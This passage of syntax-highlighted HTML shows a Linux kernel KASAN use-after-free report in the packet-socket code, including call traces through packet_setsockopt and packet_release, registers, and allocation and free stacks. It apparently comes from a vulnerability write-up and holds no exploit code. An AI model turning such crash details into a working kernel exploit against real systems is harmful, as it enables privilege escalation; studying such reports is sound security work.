class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">BIOS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.10.1<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.746433<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.747985<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dump_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x9c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.749410<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.751622<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print_address_description<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x73<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x290<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.753646<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.757343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_report<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x22b<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x340<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.758839<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__asan_report_store8_noabort<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.760617<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dev_add_pack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1b1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.761994<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">register_prot_hook<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">part<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x90<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xa0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.763675<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x5e3<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x8c0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.765072<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__sock_create<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x440<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766030<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_socket<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xef<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1b0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.766891<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">move_addr_to_kernel<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.769137<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x118<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.771668<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.773754<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.775130<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffc4e642818<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000029<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.780503<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000004002f8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044d8a7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.785654<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000003<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000011<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.790358<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007ffc4e642840<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000000ca<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007f4192e6e9d0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.793544<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000217<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b410<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.795999<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000040b4a0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.798567<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.799095<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Allocated <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1360<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.800300<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.802533<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.803959<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_kmalloc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xad<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xe0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.805833<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kmem_cache_alloc_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xd7<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.808233<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d29<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x25c0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.810226<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">SyS_setsockopt<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x158<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x240<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.811957<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.814636<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.815367<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freed <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">task<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1175<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.816935<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack_trace<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.821621<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">save_stack<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x46<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.825576<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kasan_slab_free<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x72<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.827477<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kfree<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x91<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.828523<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">packet_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x700<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xbd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.830162<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock_release<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x8d<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-47\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.831612<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sock_close<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x16<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-48\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.832906<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">__fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x276<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x6d0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-49\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.834730<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">____fput<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-50\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.835998<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">task_work_run<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x121<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x190<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-51\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.837564<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exit_to_usermode_loop<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x131<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-52\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.838709<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">syscall_return_slowpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x15c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1a0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-53\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.840403<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x92<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-54\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842343<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-55\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-i\">ffff880067d28000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59e6820c9ab0b974057516-56\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.842765<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-e\">belongs <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">cache <\/span><span class=\"crayon-v\">kmalloc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-i\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4096<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59e6820c9ab0b974057516-57\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">73.845897<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">buggy <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">located<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2160<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes 